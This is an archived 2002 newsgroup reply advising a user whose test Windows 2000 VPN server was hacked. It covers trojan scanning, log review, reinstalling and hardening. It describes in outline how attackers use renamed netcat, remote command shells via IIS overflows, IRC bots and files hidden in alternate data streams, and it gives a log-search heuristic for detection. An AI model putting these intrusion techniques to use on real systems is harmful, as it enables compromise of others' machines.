Re: VPN server
From: karl [x y] (jamescagney90210@excite.com)
Date: 07/29/02
- Next message: michael jon: "printers and Scheduled Tasks Wizard seen in network neighborhood"
- Previous message: Nia: "Error in accessing servers with different dates"
- In reply to: Snigdha: "VPN server"
- Next in thread: Snigdha: "Re: VPN server"
- Reply: Snigdha: "Re: VPN server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "karl [x y]" <jamescagney90210@excite.com> Date: Mon, 29 Jul 2002 08:57:35 -0400
"Snigdha" <snigdha20@yahoo.com> wrote in message
news:e3tmGrvNCHA.2340@tkmsftngp12...
> I am just testing installing a test VPN server in win2k machine. I left
the
> server running this weekend. The server got hacked. My ISP has taken my
> machine off the network. When I logon to the machine I found out it is
> running cmd.exe, sfind.exe, 1.tmp, irc.exe in my task manager list. Is
> there any info on there on this proccesses?
Yes, nowadays you really should not be putting unsecured systems onto the
internet, even "just a test machine," as it could be a stepping stone for a
hacker to get past your firewall and onto your regular network. Other
machines on your network could be compromised.
It's hard to tell what a file does and what a hacker did with it from a file
name. Running a trojan detector such as www.gfi.com or www.pestpatrol.com
might tell you about some of those files. If this machine was infected with
a worm, installing and running an antivirus program might help as well.
Installing Sygate firewall and running fprot from foundstone.com might also
let you see what ports are being used to communicate, which is a clue. I
would also check your IIS web and FTP server and firewall/router logs,
assuming logging is enabled. [check for any line containing .EXE or % and
that also contains a 200 or 502 result code]. Doing this could tell you
exactly what commands were used to take control of the machine.
If one of those files is a renamed nc.exe aka netcat, that file has a lot of
different purposes. cmd.exe might or might not be a dos prompt/command
shell that could allow the hacker to remotely execute commands on your
system, possibly using URLs sent to IIS web services that cause buffer
overflows. irc.exe might or might not be a file that makes your system
connect as a zombie to an IRC newsgroup and advertize its presence, waiting
for a hacker to take control of it through the IRC channel. 1.tmp might or
might not be a sniffer program collecting passwords or the sniifer log file
itself, netcat, an ftp program, etc. sfind.exe might or might not be a
program [possibly from foundstone.com] that manipulates files that are
hidden from you by using file streams [e.g. a file is named
boot.ini|hackertool.exe so that without a special tool, all you see is the
boot.ini file... in other words, there might be other hacker files on your
system]. Using sfind from foundstone.com or streams.exe from
sysinternals.com might help you find these files.
http://lists.jammed.com/forensics/2001/12/0010.html
The only way to completely be sure this system is clean is to format and
reinstall windows. This is because you might miss a hidden login ID or a
back door that would let the hacker back in. However, before you do this,
you probably want to determine how the intrusion took place, as this will
help you guard against the same thing happening next time, and might help
you determine whether other machines have been compromised.
To secure your system, install all microsoft update patches, IISlockdown
including URLscan, and perform the securing windows / IIS checklists which
are all found at www.microsoft.com/security BEFORE making the server visible
from the internet. Antivirus program that downloads updates daily, firewall
hardware and software [such as sygate which is free for non-commercial use
and Netgear which starts at just $70 US], a file change monitor like
Languard file integrity checker from www.gfi.com are all good ideas.
The book Incident Response is a good introduction to how to deal with and
recognize incidents like this, and Hacking Exposed 3rd edition is a good
overview of how to secure your system and how systems are compromised.
- Next message: michael jon: "printers and Scheduled Tasks Wizard seen in network neighborhood"
- Previous message: Nia: "Error in accessing servers with different dates"
- In reply to: Snigdha: "VPN server"
- Next in thread: Snigdha: "Re: VPN server"
- Reply: Snigdha: "Re: VPN server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
